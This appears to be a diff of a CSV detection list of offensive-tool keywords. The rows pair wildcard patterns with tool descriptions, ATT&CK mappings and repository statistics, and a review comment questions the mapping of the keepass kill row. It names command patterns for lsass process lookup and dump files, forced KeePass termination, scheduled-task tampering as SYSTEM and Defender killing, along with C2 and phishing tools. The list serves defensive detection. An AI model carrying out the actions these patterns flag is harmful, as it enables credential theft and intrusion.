+"*targetedkerberoast_hashes_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*targetedkerberoast_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
 "*targetedKerberoast-main*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z"
 "*targetver.h*","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","454","142","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z"
 "*tarunkant/Gopherus*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*tas389.ps1*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*taskkill /F /T /IM keepass.exe /FI*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*tasklist /fi *Imagename eq lsass.exe* | find *lsass*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
 "*TaskShell.exe * -b *.exe*","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","10","10","54","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z"
 "*TaskShell.exe * -s *SYSTEM*","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","10","10","54","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z"
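Review bot: The added `*taskkill /F /T /IM keepass.exe /FI*` row is categorised `Credential Access`, yet its tactic column (`TA0007 - TA0003 - TA0002 - TA0001`) has no TA0006 and its technique column (`T1069 - T1021 - T1136 - T1018`) has no credential-store technique, so a rule set or dashboard that filters on the ATT&CK columns will not surface this keyword as credential access. If the matched command is what it appears to be (forcing KeePass to close as part of a password-manager theft workflow, which the hunk itself does not confirm), the mapping would read better as `"T1555.005 - T1069 - T1021 - T1136 - T1018","TA0006 - TA0007 - TA0003 - TA0002 - TA0001"`. The row also ships with endpoint detection on, severity `10` and `metadata_comment` `N/A`; a forced kill of keepass.exe may well occur in ordinary admin or helpdesk activity, so a comment such as `"risk of false positives - correlate with remote execution context"` would help whoever triages the alert.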
@@ -17567,9 +17751,9 @@
 "*tastypepperoni/RunAsWinTcb*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z"
 "*tcpClient.connectTCP(*127.0.0.1*1337*","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/itm4n/UsoDllLoader","1","0","N/A","N/A","4","368","104","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z"
 "*tcpreplay*","offensive_tool_keyword","tcpreplay","Tcpreplay is a suite of free Open Source utilities for editing and replaying previously captured network traffic. Originally designed to replay malicious traffic patterns to Intrusion Detection/Prevention Systems. it has seen many evolutions including capabilities to replay to web servers.","T1043 - T1049 - T1052 - T1095 - T1102 - T1124 - T1497 - T1557","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://tcpreplay.appneta.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*tcpshell.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
-"*tdragon6/Supershell*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z"
-"*teamserver* no_evasion.profile*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","0","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z"
+"*tcpshell.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*tdragon6/Supershell*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z"
+"*teamserver* no_evasion.profile*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","0","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z"
 "*teamServer*ZoomAPI.py*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z"
 "*TeamServer.C2Profiles*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
 "*TeamServer.exe *github.com*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z"
@@ -17577,56 +17761,56 @@ "*TeamServer/Filters/InjectionFilters*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*TeamServer/Pivots/*.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*TeamServer\TeamServer.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*TeamsPhisher.git*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" -"*teamsphisher.log*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" -"*teamsphisher.py*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - 
TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" -"*TeamsPhisher-main.zip*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" -"*teamstracker-main*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","46","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" -"*teamviewer_passwords.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*teamviewer_passwords.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*TeamsPhisher.git*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*teamsphisher.log*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*teamsphisher.py*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" 
+"*TeamsPhisher-main.zip*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*teamstracker-main*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*teamviewer_passwords.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*teamviewer_passwords.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*techspence/ScriptSentry*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" "*tecknicaltom/dsniff*","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. 
full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well)","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","167","44","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" "*Teensypreter.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" -"*telegram2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*telegram2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*TelegramRAT-main*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z" "*temp*\pp.exe*","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","0","N/A","N/A","1","21","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" 
"*temp*KillDefender*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" "*temp*lsass_*.dmp*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"*temp*whoami.txt*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*Temp\dumpert*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*temp\stager.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*temp*whoami.txt*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*Temp\dumpert*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 